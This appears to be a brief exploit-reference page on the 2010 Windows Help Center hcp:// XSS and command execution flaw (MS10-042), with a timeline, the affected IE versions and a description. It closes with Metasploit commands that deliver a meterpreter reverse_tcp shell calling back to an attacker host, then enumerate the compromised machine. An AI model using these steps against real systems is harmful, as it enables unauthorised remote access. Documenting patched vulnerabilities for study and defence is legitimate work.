MS10-042 : Microsoft Windows Help Center XSS and Command Execution

Timeline :

Vulnerability & PoC disclosed by Tavis Ormandy the 2010-06-10
Metasploit PoC provided by natron the 2010-06-10
Microsoft patch “KB2229593” provided the 2010-07-13

PoC provided by :

Tavis Ormandy
natron

Reference(s) :

CVE-2010-1885
MS10-042

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8

Tested on Windows XP SP3 with :

Internet Explorer 8

Description :

Help and Support Center is the default application provided to access online documentation for Microsoft Windows. Microsoft supports accessing help documents directly via URLs by installing a protocol handler for the scheme “hcp”. Due to an error in validation of input to hcp:// combined with a local cross site scripting vulnerability and a specialized mechanism to launch the XSS trigger, arbitrary command execution can be achieved. On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it can be used to launch the exploit automatically. If IE8 and WMP11, either can be used to launch the attack, but both pop dialog boxes asking the user if execution should continue. This exploit detects if non-intrusive mechanisms are available and will use one if possible. In the case of both IE8 and WMP11, the exploit defaults to using an iframe on IE8, but is configurable by setting the DIALOGMECH option to “none” or “player”.

Commands :

use windows/browser/ms10_042_helpctr_xss_cmd­_exec
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig